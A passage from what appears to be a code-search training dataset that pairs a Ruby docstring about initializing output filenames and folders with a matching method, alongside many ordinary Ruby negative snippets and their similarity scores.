"0.64421964",
"0.6403914",
"0.64034814",
"0.6386826",
"0.6386826",
"0.6386826",
"0.6386826",
"0.6386826",
"0.6386826",
"0.63814163",
"0.63711375",
"0.6343197",
"0.6336318",
"0.6292608",
"0.6289016",
"0.6277434",
"0.62751323",
"0.62734497",
"0.625499",
"0.62474537",
"0.62439287",
"0.62360126",
"0.6235169",
"0.6231147",
"0.61939937",
"0.61897403",
"0.6138114",
"0.6121156",
"0.61210424",
"0.6115032",
"0.6087251",
"0.6083472",
"0.6083255",
"0.6073946",
"0.6065185",
"0.60555774",
"0.6051501",
"0.60496753",
"0.60321236",
"0.6026107",
"0.602019",
"0.6004298",
"0.6004216",
"0.6003646",
"0.59966785",
"0.5995178",
"0.5992789",
"0.59743583"
] |
0.0
|
-1
|
Default award blows up: enforce subclass impl.
|
def update
raise 'Unimplemented award type update!'
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def dispatch\n raise(NotImplemetedError, \"subclass responsability\")\n end",
"def inherited(subclass); end",
"def inherited(klass); end",
"def inherited(klass); end",
"def superclass() end",
"def inherited(base); end",
"def award; end",
"def subclass_responsibility\n raise SubclassResponsibility.exception\n end",
"def credit_account\n subclass_must_define\n end",
"def process_hook\n fail 'child class to implement'\n end",
"def abstract?; end",
"def special\n override\n end",
"def overrides; end",
"def super_class; end",
"def super_class; end",
"def base_class; end",
"def exchange\n raise \"This is an abstract class. Override exchange method in descendant class\"\n end",
"def implementation\n fail 'Subclasses must implement implementation()!'\n end",
"def verb\n raise NotImplementedError.new('Must override')\n end",
"def class Motorbike < Vehicle\r\n def wheelie\r\n end\r\nend",
"def inherited( subclass )\n\t\t\tsuper\n\t\t\tStrelka::App::Auth.extended_apps << subclass\n\t\t\tsubclass.instance_variable_set( :@auth_provider, @auth_provider )\n\t\t\tsubclass.instance_variable_set( :@positive_auth_criteria, @positive_auth_criteria.dup )\n\t\t\tsubclass.instance_variable_set( :@negative_auth_criteria, @negative_auth_criteria.dup )\n\t\t\tsubclass.instance_variable_set( :@positive_perms_criteria, @positive_perms_criteria.dup )\n\t\t\tsubclass.instance_variable_set( :@negative_perms_criteria, @negative_perms_criteria.dup )\n\t\tend",
"def awaken!\n\t\traise 'Not implemented'\n\tend",
"def abstract!; end",
"def issue(*)\n raise NotImplementedError, 'This should be defined in a subclass'\n end",
"def offer\n raise \"Unimplemented 'offer' for intention: #{self.inspect}!\"\n end",
"def super_method; end",
"def validate_options!(_options)\n raise(NotImplemetedError, \"subclass responsability\")\n end",
"def choose\n raise NotImplementedError.new('Must override')\n end",
"def award\n\tend",
"def process_hook\n fail 'sub class to implement'\n end",
"def call\n raise 'You must implement your own #call method in your subclass.'\n end",
"def failsafe_action\n super\n end",
"def abstract_class=(_arg0); end",
"def abstract_class=(_arg0); end",
"def my_fare\n\traise NotImplementedError,\n\t \"This class #{self.class.to_s} can not respond to the method::: #{__method__.to_s}\"\n end",
"def validate_subclasses\n # Validate instance methods\n if not(self.respond_to?(:scrape))\n throw Exception.new('subclass fails to implement the required scrape method')\n end\n end",
"def inherited(_sub)\n raise Error, \"cannot subclass #{self}\" unless self == Object\n end",
"def inherited(subclass)\n super\n subclass.rules.update self.rules\n end",
"def valid?\n raise Error::MethodShouldBeOverridenByExtendingClassError\n end",
"def primary_account\n subclass_must_define\n end",
"def gross\n raise NotImplementedError, \"Must implement this method in the subclass\"\n end",
"def override() # Note that despite the module.override, this still overrides\r\n puts \"CHILD override()\"\r\n end",
"def inherited( subclass )\n\t\tsuper\n\t\tStrelka::Discovery.log.info \"%p inherited by discoverable class %p\" % [ self, subclass ]\n\t\tStrelka::Discovery.add_inherited_class( subclass )\n\tend",
"def target_class\n raise NoMethodError, \"subclasses must return a class for the target (to implement #{__method__})\"\n end",
"def pickup!\n raise NotImplementedError, \"Subclasses must implemenet :pickup!\"\n end",
"def state\n throw \"must be provided by subclass\"\n end",
"def subclass_from_attributes(attrs)\n active_authorizer[:default].deny?(inheritance_column) ? nil : super\n end",
"def subclass_from_attrs(attrs)\n active_authorizer[:default].deny?(inheritance_column) ? nil : super\n end",
"def wont_be_kind_of(cls, msg=nil)\n KindAssay.refute!(self, cls, :message=>msg, :backtrace=>caller)\n end",
"def override_attr(attr, own_attr_val)\n return own_attr_val if own_attr_val\n award.send(attr) if award\n end",
"def actual_flow_control\n super\n end",
"def generate_new_item_object\n FlyError::raise_superclass_error\n end",
"def override()\n puts \"CHILD override()\"\n end",
"def commence\n raise NotImplementedError\n end",
"def calls_super # :nodoc:\n false\n end",
"def valid_upto\n fail 'sub-class to implement'\n end",
"def inherit_stuff\n return unless accepted_genus\n\n self.classification ||= accepted_genus.classification\n self.lifeform ||= accepted_genus.lifeform\n end",
"def score_player\n raise 'Method score_player cannot be called directly. It must be overridden in a child class first.'\n end",
"def subclass( & block )\n \n add_hook_context( :subclass )\n action( & block ) if block_given?\n \n return self\n\n end",
"def tag; raise 'Override this method'; end",
"def best_hand\n raise\n end",
"def wont_be_instance_of(cls, msg=nil)\n InstanceAssay.refute!(self, cls, :message=>msg, :backtrace=>caller)\n end",
"def root_type\n raise \"subclass responsibility\"\n end",
"def certain?\n fail NotImplementedError\n end",
"def ok?\n raise \"Subclasses must implement this method.\"\n end",
"def base; self; end",
"def accessibility; end",
"def set_award_type(name, expires_in, quality)\n case name\n when 'Blue First'\n BlueFirst.new(name, expires_in, quality)\n when 'Blue Distinction Plus'\n BlueDistinctionPlus.new(name, expires_in, quality)\n when 'Blue Compare'\n BlueCompare.new(name, expires_in, quality)\n when 'Blue Star'\n BlueStar.new(name, expires_in, quality)\n else\n StandardAward.new(name, expires_in, quality)\n end\n end",
"def dispatch\n raise NotImplementedError\n end",
"def invoke\r\n # TODO: rename to more appropriate one 2007/05/10 by shino\r\n raise 'must be implemented in subclasses'\r\n end",
"def generate\n throw \"override me before innocent kittens are hurt!\"\n end",
"def inherit_actions(actions = superclass.actions, exclude: [])\n\t\t\t\t(actions - exclude).each do |public_method|\n\t\t\t\t\tum = superclass.public_instance_method(public_method)\n\t\t\t\t\tdefine_method public_method, um\n\t\t\t\tend\n\t\t\tend",
"def http_method\n raise \"Implement in child class\"\n end",
"def advice\n end",
"def validate_subclasses\n # Validate instance methods\n if not(self.respond_to?(:scrape_article))\n throw Exception.new(\"subclass fails to implement the required scrape method\")\n end\n\n # Validate class methods\n if not(self.class.respond_to?(:source_name))\n throw Exception.new(\"subclass fails to provide source_name\")\n end\n\n end",
"def process\n raise \"#{self.class}: method #{__method__} must be implemented for #{@reference_action_def.to_s}.\"\n end",
"def anchored; end",
"def reject(*)\n super.tap do\n __debug_sim('USER must make change(s) to complete the submission.')\n end\n end",
"def foo(...)\n super(...)\nend",
"def inherited(klass)\n super\n klass.send :include, ::Henshin::Safety\n klass.instance_variable_set(:@unsafe_methods, @unsafe_methods)\n end",
"def import\n raise \"#{self.class.name}::#{__method__} must be overridden\"\n end",
"def superclass!\n # -> uncomment the next line to manually enable rule tracing\n # trace_in( __method__, 30 )\n\n type = SUPERCLASS\n channel = ANTLR3::DEFAULT_CHANNEL\n\n \n # - - - - main rule block - - - -\n # at line 333:4: 'superclass'\n match( \"superclass\" )\n\n \n @state.type = type\n @state.channel = channel\n\n ensure\n # -> uncomment the next line to manually enable rule tracing\n # trace_out( __method__, 30 )\n\n end",
"def validate\n fail 'sub class to implement'\n end",
"def invoke\n raise NotImplementedError, \"Author of subclass forgot to implement #invoke\"\n end",
"def errors\n raise 'Method should implemented in inherit class'\n end",
"def verify?; raise NotImplementedError; end",
"def base_operation1\n puts 'AbstractClass says: I am doing the bulk of the work'\n end",
"def policy; end",
"def playable_action\n raise NotImplementedError\n end",
"def allowed?() raise NotImplementedError end",
"def perform\n raise Errors::AbstractMethod\n end",
"def super_decl; end",
"def implementation; end",
"def implementation; end",
"def requested_flow_control\n super\n end",
"def callsign\n raise \"Not Implemented. Class #{self.class.name} doesn't implement callsign\"\n end",
"def invoke_action(opt = {})\n raise(\"Method not implemented for this class: #{@klass}\")\n end",
"def subclass_validations ; true ; end",
"def type\n raise 'derived should implement'\n end",
"def report\n raise \"Calling Abstract method report on class Heuristic.\"\n end"
] |
[
"0.6986472",
"0.63125956",
"0.6234999",
"0.6234999",
"0.6099691",
"0.6068501",
"0.60386944",
"0.5973817",
"0.5859422",
"0.58170426",
"0.57990134",
"0.5797329",
"0.57708263",
"0.5677208",
"0.5677208",
"0.56476194",
"0.56460786",
"0.5640153",
"0.5621632",
"0.5609746",
"0.559156",
"0.5583009",
"0.5578262",
"0.5573543",
"0.5559014",
"0.5528145",
"0.5508477",
"0.5496218",
"0.54542947",
"0.54400057",
"0.5436482",
"0.5424004",
"0.54111284",
"0.54111284",
"0.5409784",
"0.54083925",
"0.5404082",
"0.53915817",
"0.53603226",
"0.53574157",
"0.5355847",
"0.53545254",
"0.5343667",
"0.53435636",
"0.53346825",
"0.53289485",
"0.53272694",
"0.5324593",
"0.53061587",
"0.5285719",
"0.52826047",
"0.52750564",
"0.5267724",
"0.52627516",
"0.52615887",
"0.52511036",
"0.5247333",
"0.5239209",
"0.5228788",
"0.52285",
"0.5207243",
"0.52060574",
"0.52053297",
"0.51999736",
"0.519847",
"0.51862764",
"0.51836026",
"0.5179106",
"0.51671106",
"0.51621705",
"0.51577985",
"0.5153708",
"0.5150565",
"0.51491714",
"0.51470274",
"0.51387477",
"0.51283973",
"0.51256305",
"0.51248896",
"0.511693",
"0.51165724",
"0.51156104",
"0.5101484",
"0.5098",
"0.5094795",
"0.5092383",
"0.5091665",
"0.5077972",
"0.50768024",
"0.5071521",
"0.5066728",
"0.50641227",
"0.5058256",
"0.5058256",
"0.50576067",
"0.50554913",
"0.50536865",
"0.50519675",
"0.5046227",
"0.50421447"
] |
0.6176183
|
4
|
Initializes all output filenames and folders for later use names object of class Filename; contains filenames & folders force_overwrite If true, pipeline will overwrite all existing files Returns nothing
|
def initialize(names, force_overwrite)
@names = names
@force_overwrite = force_overwrite
end
|
{
"objective": {
"self": [],
"paired": [],
"triplet": [
[
"query",
"document",
"negatives"
]
]
}
}
|
[
"def output_files\n @output_files ||= Fileset.new()\n end",
"def output_files\n @output_files ||= Fileset.new\n end",
"def output_files\n @output_files ||= Fileset.new\n end",
"def create_output_files\n return unless @option_output_path\n return if @collected_nodes.empty?\n @collected_nodes.each do |certname, properties|\n next if properties['settings'].empty?\n output_file = \"#{@option_output_path}/nodes/#{certname}.yaml\"\n File.write(output_file, properties['settings'].to_yaml)\n output(\"## Wrote Hiera YAML file: #{output_file}\\n\\n\")\n end\n return if @common_settings.empty?\n output_file = \"#{@option_output_path}/common.yaml\"\n File.write(output_file, @common_settings.to_yaml)\n end",
"def initialize_output_directory()\n require 'fileutils'\n FileUtils.mkdir_p(OUTPUT_DIRECTORY)\n end",
"def prepare\n FileUtils.rm_rf(output_dir)\n FileUtils.mkdir_p(output_dir)\n end",
"def prepare\n FileUtils.rm_rf(output_dir)\n FileUtils.mkdir_p(output_dir)\n end",
"def output_files\n @output_files ||= to_file(@args.output)\n end",
"def gen_sub_directories\n @outputdir.mkpath\n end",
"def create_output_file filename # :yields: complete_filename\n output_path = @output_root + filename\n @logger.info \"Writing to #{output_path}#{dry_run ? \" (skipped - dry run)\" : \"\"}\" do\n unless dry_run\n folder = output_path.dirname\n folder.mkpath unless folder.directory?\n yield output_path\n end\n end\n end",
"def init_files(input, output)\n can_read?(input)\n\n @output_file = prepare_write_file(output)\n @error_file = prepare_write_file(ERROR_FILE)\n\n @output_file << LineParser::RESULT_HEADER.to_csv\n @error_file << LineParser::ERROR_HEADER.to_csv\n end",
"def process()\n @file_info = FileInfoFile.new(@file_info_file)\n @namespace = @file_info.default_namespace\n \n namespaces_file = NamespacesFile.new(@uploads_directory, @scan_only)\n namespaces_file.add_namespace(@namespace)\n namespaces_file.write()\n @prefix = namespaces_file.prefix(@namespace)\n \n create_image_files_where_needed()\n end",
"def gen_sub_directories\n\t\t@outputdir.mkpath\n\tend",
"def gen_sub_directories\n\t\t@outputdir.mkpath\n\tend",
"def generate(output_folder, types, version_name)\n generate_objects(output_folder, types, version_name)\n copy_files(output_folder) \\\n unless @config.files.nil? || @config.files.copy.nil?\n compile_examples(output_folder) unless @config.examples.nil?\n compile_changelog(output_folder) unless @config.changelog.nil?\n # Compilation has to be the last step, as some files (e.g.\n # CONTRIBUTING.md) may depend on the list of all files previously copied\n # or compiled.\n compile_files(output_folder, version_name) \\\n unless @config.files.nil? || @config.files.compile.nil?\n\n generate_datasources(output_folder, types, version_name) \\\n unless @config.datasources.nil?\n apply_file_acls(output_folder) \\\n unless @config.files.nil? || @config.files.permissions.nil?\n end",
"def defaults\n {\n filename: 'out',\n timestamp: false,\n write_file: true,\n }\n end",
"def generate_data_files\n files = {}\n\n # extracted data\n @classes.each do |category|\n files[category] = {}\n folder = File.join(@res, 'data', category.to_s, 'extracted')\n\n files[category][:extracted] = File.join(folder, \"#{category}.json\")\n end\n\n # divided data\n @classes.each do |category|\n files[category][:divided] = {}\n folder = File.join(@res, 'data', category.to_s, 'divided')\n\n @subsets.each do |subset|\n files[category][:divided][subset] = File.join(folder,\n \"#{category}_#{subset}.json\")\n end\n end\n\n # preprocessed data\n @classes.each do |category|\n files[category][:preprocessed] = {}\n\n @preproc.each do |preprocess|\n folder = File.join(\n @res, 'data', category.to_s, 'preprocessed', preprocess.to_s)\n\n files[category][:preprocessed][preprocess] = {}\n\n @subsets.each do |subset|\n files[category][:preprocessed][preprocess][subset] = File.join(\n folder, \"#{category}_#{subset}.json\")\n end\n end\n end\n\n # transformed data\n if @trans.size > 0\n @classes.each do |category|\n files[category][:transformed] = {}\n\n @trans.each do |transformation|\n @preproc.each do |preprocess|\n ctrans = :\"#{transformation}_#{preprocess}\"\n\n folder = File.join(\n @res, 'data', category.to_s, 'transformed', ctrans.to_s)\n\n files[category][:transformed][ctrans] = {}\n\n @subsets.each do |subset|\n files[category][:transformed][ctrans][subset] = File.join(\n folder, \"#{category}_#{subset}.json\")\n end\n end\n end\n end\n end\n\n # classified data\n if @classifs.size > 0\n @classes.each do |category|\n files[category][:classified] = {}\n\n @classifs.each do |classifier|\n @trans.each do |transformation|\n @preproc.each do |preprocess|\n ctrans = :\"#{classifier}_#{transformation}_#{preprocess}\"\n\n folder = File.join(\n @res, 'data', category.to_s, 'classified', ctrans.to_s)\n\n files[category][:classified][ctrans] = {}\n\n @subsets.each do |subset|\n files[category][:classified][ctrans][subset] = File.join(\n folder, \"#{category}_#{subset}.json\")\n end\n end\n end\n end\n end\n end\n files\n end",
"def createFileNameArr\n # Build Mirror Array of Filenames\n @fileNameArr.each do |filename|\n filename.gsub!(\" \", \"-\")\n end\n\n end",
"def prepare\r\n # if output_dir is not specified, output in the same directory\r\n # as the imput file\r\n @output_dir = File.dirname(@input_file) if !@output_dir && @input_file\r\n\r\n if /.bz2$/ =~ @input_file\r\n if @bz2_gem\r\n file = Bzip2::Reader.new File.open(@input_file, \"r:UTF-8\")\r\n elsif Gem.win_platform?\r\n file = IO.popen(\"bunzip2.exe -c #{@input_file}\")\r\n elsif (bzpath = command_exist?(\"lbzip2\") || command_exist?(\"pbzip2\") || command_exist?(\"bzip2\"))\r\n file = IO.popen(\"#{bzpath} -c -d #{@input_file}\")\r\n end\r\n else # meaning that it is a text file\r\n @infile_size = File.stat(@input_file).size\r\n file = open(@input_file)\r\n end\r\n\r\n # create basename of output file\r\n @outfile_base = File.basename(@input_file, \".*\") + \"-\"\r\n @total_size = 0\r\n @file_index = 1\r\n outfilename = File.join(@output_dir, @outfile_base + @file_index.to_s)\r\n @outfiles = []\r\n @outfiles << outfilename\r\n @fp = File.open(outfilename, \"w\")\r\n @file_pointer = file\r\n true\r\n end",
"def initialize(output_file)\n @output_file = output_file\n @folders = []\n end",
"def populate_output_path(options = {})\n base = Pathname.new(@source_path).basename.to_s\n if options.empty?\n result = base\n else\n name, ext = *base.split(\".\")\n if options[:output_path].nil? || File.directory?(options[:output_path])\n tokens = \"\"\n MODULES.each do |mod|\n token = mod.filename_token(options)\n tokens += \"-#{token}\" unless token.nil?\n end\n result = options[:output_path].nil? ? \"\" : \"#{options[:output_path].to_s}/\"\n result += \"#{name}#{tokens}.#{ext}\"\n elsif !options[:output_path].nil?\n result = \"#{options[:output_path].to_s}.#{ext}\"\n end\n end\n @path = Pathname.new(result)\n end",
"def prepareDirectory( outputfn )\n scriptpath = File.dirname __FILE__\n cf = File.join scriptpath, \"conversion_files\"\n i = 0 \n max = 3\n\n print \"#\"*40, \"\\n\", \"Preparing Directory\\n\", \"#\"*40, \"\\n\\n\"\n\n phasePrint \"Create Base Folder / Check Dependencies\", i+=1, max\n # Make our base directory\n if not Dir.exists? outputfn\n FileUtils.mkdir_p outputfn\n end\n\n # See if our conversion_files folder exists, this is required\n if not Dir.exists? cf \n error \"Missing conversion_files folder:\\n#{cf}\\n\\nThe conversion process cannot continue.\"\n return nil\n end\n\n # Check for the python cache extracted folder\n if not Dir.exists? File.join( cf, \"python27\" ) and $options[:python]\n if not File.exists? cf+\"python27.zip\"\n error \"Missing packaged Python 2.7.8 installation folder or zip in conversion_files, this is required for the \\\"Include Python\\\"//\\\"--python\\\" option.\\n\\nThe conversion process cannot continue.\"\n return nil\n else\n # Extract our python27.zip folder\n phasePrint \"Extracting Python\", i+=0.5, max\n error \"Extracting python27.zip, this may take some time.\\n\\nIt is quicker to extract this by hand into the conversion_files folder using 7-zip or Peazip, as they are capable of using multiple cores.\"\n unzip \"#{cf}python27.zip\", cf\n end\n end\n\n i = i.floor if i.is_a? Float\n phasePrint \"Copying Python to Output Folder\", i+=1, max\n print \" This will take some time\\n\"\n # Copy Python over to the directory\n if not Dir.exists? File.join( outputfn, \"python27\" ) and $options[:python]\n FileUtils.cp_r File.join( cf, \"python27\" ), outputfn\n end\n\n phasePrint \"Initializing File Structure\", i+=1, max\n FileUtils.cp File.join( cf, \"run.bat\" ), outputfn\n\n FileUtils.cp_r File.join( cf, \"includes\" ), outputfn\n\n return File.new( File.join( outputfn, \"run_test.py\" ), \"w+:UTF-8\" )\nend",
"def created_mp3s(splitter = @splitter)\n Dir.glob(\"#{splitter.output_folder}/*.mp3\").map { |f| File.basename f }\nend",
"def make_files(targets)\n file_pairs = targets.map { |t| \n filename = sanitize_filename(t[:data][:name] + '.json')\n [filename, t]\n }\n unique_pairs = uniqufy(file_pairs)\n unique_pairs.each do |name, content| \n puts \"Write #{File.absolute_path(name)}\"\n File.open(name, 'w') { |file| file.write(JSON.pretty_generate(content)) }\n end\nend",
"def write\n make_parent_directory\n generate_file\n end",
"def setup_filesystem\n FileUtils.mkdir_p($out_pth)\n FileUtils.mkdir_p($log_dir)\n end",
"def initialize(folder1, folder2, options)\n \t @folder1 = folder1\n \t @folder2 = folder2\n \t @format = options['output']\n \t @filehash = Hash.new\n\t\t\t validate\n\t\tend",
"def generate_flux_input_files\n # At the moment we must use subfolders\n for i in 0...n_flux_tubes\n #gs2run = gs2_run(:base).dup\n #gs2_run(i).instance_variables.each do |var|\n #gs2run.instance_variable_set(var, gs2_run(i).instance_variable_get(var))\n #end\n fluxrun = flux_runs[i]\n #ep ['gs2_runs[i] in generate', gs2_runs[i].nwrite]\n #p ['i',i]\n #if i >= n_flux_tubes_jac\n #jn = i - n_flux_tubes_jac + 1\n #run_name = \"calibrate_\" + @run_name + (jn).to_s\n #folder = \"calibrate_#{jn}\"\n #else\n #jn = i + 1\n #run_name = @run_name + (jn).to_s\n #folder = \"flux_tube_#{jn}\"\n #end\n\n folder = flux_folder_name(i)\n run_name = flux_run_name(i)\n\n if @subfolders and @subfolders.fortran_true?\n fluxrun.directory = @directory + \"/\" + folder\n FileUtils.makedirs(fluxrun.directory)\n fluxrun.relative_directory = @relative_directory + \"/\" + folder\n fluxrun.restart_dir = fluxrun.directory + \"/nc\"\n else\n fluxrun.directory = @directory\n fluxrun.relative_directory = @relative_directory\n end\n fluxrun.run_name = run_name\n fluxrun.nprocs = @nprocs\n if i==0\n block = Proc.new{check_parameters}\n else\n block = Proc.new{}\n end\n #if @restart_id\n #gs2run.restart_id =\n Dir.chdir(fluxrun.directory) do\n fluxrun.generate_input_file(&block)\n fluxrun.write_info\n end\n\n ### Hack the input file so that gs2 gets the location of\n # the restart dir correctly within trinity\n if @subfolders and @subfolders.fortran_true? \n infile = fluxrun.directory + \"/\" + fluxrun.run_name + \".in\"\n text = File.read(infile)\n File.open(infile, 'w'){|f| f.puts text.sub(/restart_dir\\s*=\\s*\"nc\"/, \"restart_dir = \\\"#{folder}/nc\\\"\")}\n end\n end\n end",
"def generate_unique_filename\n name = options[:file_name] || wrapper.name\n # TODO: Sanitize the file name\n\n filename = \"#{name}.swatches\"\n\n related_files = related_file_indexes(filename)\n\n filename = if related_files.present?\n \"#{name}-#{related_files.max + 1}#{SWATCHES_EXTENSION}\"\n else\n \"#{name}#{SWATCHES_EXTENSION}\"\n end\n\n @swatches_path = File.join(options[:export_directory], filename)\n end",
"def all_filenames\n\n\n # This checks for it being an array and not nil!\n # return @filenames if @filenames && !@filenames.empty?\n\n # This means we can add files to the output\n return $filenames if $filenames && $filenames.size > 5 # I guess that small numbers are errors too\n \n if @directory\n @output_directory ||= File.join(@directory, 'Build')\n $filenames = Dir.glob(File.join(@directory, \"**/*\")).map {|file|\n next if file.start_with?(@output_directory)\n next if File.directory?(file)\n file.gsub(@directory+\"/\", \"\")\n }.compact\n else\n []\n end\n end",
"def keep_files=(_arg0); end",
"def generate_file_list\n self.file_list = Concurrent::Array.new\n targets.each do |target|\n add_target(target)\n end\n end",
"def output_files\n get_info :output_files\n end",
"def generate_filename\n #if episodeTitle != brandTitle (brandTitle looks to be the name of the program) then use this in the filename\n if @metadata[:episodeTitle] != @metadata[:brandTitle]\n out_file = \"#{@metadata[:title1]}__#{@metadata[:title2]}__#{@metadata[:episodeTitle]}\"\n else #otherwise just use title1/2\n out_file = \"#{@metadata[:title1]}__#{@metadata[:title2]}\"\n end\n out_file.gsub!(/[^0-9A-Za-z.\\-]/, '_') #replace non alphanumerics with underscores\n\n @out_file = File.join(@out_dir, out_file)\n end",
"def existing_files; end",
"def sort_out_output_directories \n FileUtils.mkdir_p(output_directory)\n FileUtils.mkdir_p(xml_directory)\n FileUtils.mkdir_p(intermediate_directory) unless run_in_memory\n end",
"def imagepipeline\n # delete non-image files\n images = Dir.entries(@from_dir).delete_if do |file|\n (file =~ /\\w+\\.(jpg|jpeg)/) == nil\n end\n images.each do |file|\n yield File.join(@from_dir,file), File.join(@to_dir,file)\n end\n end",
"def initialize(name)\n self.original_filename = name\n self.root_dir = controll_root\n clean_tmpdir\n #creo una nuova cartella per il file attuale\n self.tmp_dir = \"#{self.root_dir.path}/#{Time.now.to_f}\"\n Dir.mkdir(self.tmp_dir)\n ext = File.extname(name)\n name = [File.basename(name), ext] unless ext.blank?\n\n @tmp_file = Tempfile.create(name, self.tmp_dir)\n\n self.unique_filename= File.basename(self.path)\n end",
"def initialize(info, prefix_dir) \r\n @info_dictionary = info\r\n @files = Array.new\r\n @piece_files = Array.new\r\n @pieceLength = info[\"piece length\"]\r\n @numBytes = 0\r\n @totalPieces = info[\"pieces\"].bytesize / 20\r\n \r\n build_dir_path(prefix_dir)\r\n \r\n unless prefix_dir.chars.last == File::SEPARATOR \r\n prefix_dir += File::SEPARATOR \r\n end\r\n \r\n no_files_existed = true\r\n if info[\"files\"] != nil\r\n # multiple file mode\r\n \r\n unless Dir.exists?(prefix_dir + info[\"name\"])\r\n Dir.mkdir(prefix_dir + info[\"name\"])\r\n end\r\n \r\n info[\"files\"].each { |file|\r\n @numBytes += file[\"length\"]\r\n filename = file[\"path\"].last\r\n \r\n build_dir = prefix_dir + info[\"name\"] + File::SEPARATOR # for making directory trees\r\n file[\"path\"].rotate(-1).drop(1).each { |dir| # don't use filename (last element)\r\n build_dir += (dir + File::SEPARATOR) # use constant separator for portability\r\n unless Dir.exists?(build_dir)\r\n Dir.mkdir(build_dir)\r\n end\r\n }\r\n \r\n if File.exists?(build_dir + filename)\r\n no_files_existed = false\r\n end\r\n @files << [File.open(build_dir + filename, File::RDWR | File::CREAT), file[\"length\"]]\r\n if @files.last[0].size < @files.last[1]\r\n @files.last[0].seek(@files.last[0].size, IO::SEEK_SET)\r\n @files.last[0].write(\"\\0\" * (@files.last[1] - @files.last[0].size))\r\n end\r\n }\r\n else\r\n # single file mode\r\n @numBytes = info[\"length\"] \r\n if File.exists?(prefix_dir + info[\"name\"])\r\n no_files_existed = false\r\n end\r\n @files << [File.open(prefix_dir + info[\"name\"], File::RDWR | File::CREAT), info[\"length\"]]\r\n if @files.last[0].size < @files.last[1] # still needs to be checked even if file exists\r\n @files.last[0].seek(@files.last[0].size, IO::SEEK_SET)\r\n (0..((@files.last[1] - @files.last[0].size)/1024)).each {\r\n @files.last[0].write(\"\\0\" * 1024)\r\n }\r\n end\r\n end\r\n unless no_files_existed\r\n recheckComplete()\r\n else\r\n gen_initial_states()\r\n end\r\n \r\n #puts @bitfield.to_binary_string\r\n end",
"def initialize(*args)\n parse_params(*args)\n files = args.each_with_object([]) { |a, o| o << Dir[a.to_s] }\n @files = files.flatten.sort.uniq\n end",
"def setup_outputs_for(input_file_path)\n file_name_without_extension = File.basename(input_file_path, '.*')\n outputs = (exporters || Tracksperanto.exporters).map do | exporter_class |\n export_name = [file_name_without_extension, exporter_class.desc_and_extension].join(\"_\")\n export_path = File.join(File.dirname(input_file_path), export_name)\n exporter_class.new(open_owned_export_file(export_path))\n end\n \n Tracksperanto::Export::Mux.new(outputs)\n end",
"def replaced_files; end",
"def initialize\n @files = []\n end",
"def create_work\n @files.each do |file|\n executor.queue { file.copy_file(@output_dir) }\n end\n end",
"def write_images\n # Enumerate all the files in the zip and write any that are in the media directory to the output buffer (which is used to generate the new zip file)\n @file.read_files do |entry| # entry is a file entry in the zip\n if entry.name.include? IMAGE_DIR_NAME\n # Check if this is an image being replaced\n current_image = @images.select { |image| !@relationship_manager.get_relationship(image.id).nil? and entry.name.include? @relationship_manager.get_relationship(image.id)[:target] }.first\n\n unless current_image.nil?\n replacement_path = current_image.path\n data = ::File.read(replacement_path)\n else\n entry.get_input_stream { |is| data = is.sysread }\n end\n\n @file.output_stream.put_next_entry(entry.name)\n @file.output_stream.write data\n end\n end\n\n # Create any new images\n @unique_image_paths = []\n @images.select { |image| image.is_new }.each do |new_image|\n next if @unique_image_paths.include? new_image.target # we only want to write each image once\n @unique_image_paths << new_image.target\n @file.output_stream.put_next_entry(\"word/#{new_image.target}\")\n @file.output_stream.write ::File.read(new_image.path)\n end\n end",
"def setup()\n create_directories\n end",
"def new_files; end",
"def create_output_directories\n return unless @option_output_path\n subdirectory = \"#{@option_output_path}/nodes\"\n return @option_output_path if File.directory?(@option_output_path) && File.directory?(subdirectory)\n Dir.mkdir(@option_output_path)\n output_path_error_and_exit(@option_output_path) unless File.directory?(@option_output_path)\n Dir.mkdir(subdirectory)\n output_path_error_and_exit(subdirectory) unless File.directory?(subdirectory)\n @option_output_path\n end",
"def run_it\n run_through_directory\n file_array_parser\n remove_initial_and_format_change\n array_to_hash\n final_name_info\n create_goal_file\nend",
"def setup_output_dir(dir, force)\n flag_file = output_flag_file dir\n\n last = {}\n\n if @options.dry_run then\n # do nothing\n elsif File.exist? dir then\n error \"#{dir} exists and is not a directory\" unless File.directory? dir\n\n begin\n File.open flag_file do |io|\n unless force then\n Time.parse io.gets\n\n io.each do |line|\n file, time = line.split \"\\t\", 2\n time = Time.parse(time) rescue next\n last[file] = time\n end\n end\n end\n rescue SystemCallError, TypeError\n error <<-ERROR\n\nDirectory #{dir} already exists, but it looks like it isn't an RDoc directory.\n\nBecause RDoc doesn't want to risk destroying any of your existing files,\nyou'll need to specify a different output directory name (using the --op <dir>\noption)\n\n ERROR\n end unless @options.force_output\n else\n FileUtils.mkdir_p dir\n FileUtils.touch flag_file\n end\n\n last\n end",
"def filenames; end",
"def distribute\n output_dir(@spec.meta, @meta_dir)\n output_dir(@spec.path, @path_dir)\n output_dir(@spec.model, @model_dir)\n true\n end",
"def generate_file_files\n setup\n\n page_file = @template_dir + 'page.rhtml'\n fileinfo_file = @template_dir + 'fileinfo.rhtml'\n\n # for legacy templates\n filepage_file = @template_dir + 'filepage.rhtml' unless\n page_file.exist? or fileinfo_file.exist?\n\n return unless\n page_file.exist? or fileinfo_file.exist? or filepage_file.exist?\n\n debug_msg \"Generating file documentation in #{@outputdir}\"\n\n out_file = nil\n current = nil\n\n @files.each do |file|\n current = file\n\n if file.text? and page_file.exist? then\n generate_page file\n next\n end\n\n template_file = nil\n out_file = @outputdir + file.path\n debug_msg \" working on %s (%s)\" % [file.full_name, out_file]\n rel_prefix = @outputdir.relative_path_from out_file.dirname\n search_index_rel_prefix = rel_prefix\n search_index_rel_prefix += @asset_rel_path if @file_output\n\n asset_rel_prefix = rel_prefix + @asset_rel_path\n\n unless filepage_file then\n if file.text? then\n next unless page_file.exist?\n template_file = page_file\n @title = file.page_name\n else\n next unless fileinfo_file.exist?\n template_file = fileinfo_file\n @title = \"File: #{file.base_name}\"\n end\n end\n\n @title += \" - #{@options.title}\"\n template_file ||= filepage_file\n\n render_template template_file, out_file do |io|\n here = binding\n # suppress 1.9.3 warning\n here.local_variable_set(:asset_rel_prefix, asset_rel_prefix)\n here.local_variable_set(:current, current)\n here\n end\n end\n rescue => e\n error =\n RDoc::Error.new \"error generating #{out_file}: #{e.message} (#{e.class})\"\n error.set_backtrace e.backtrace\n\n raise error\n end",
"def create_output_directory\n FileUtils.mkdir_p @output_dir\n end",
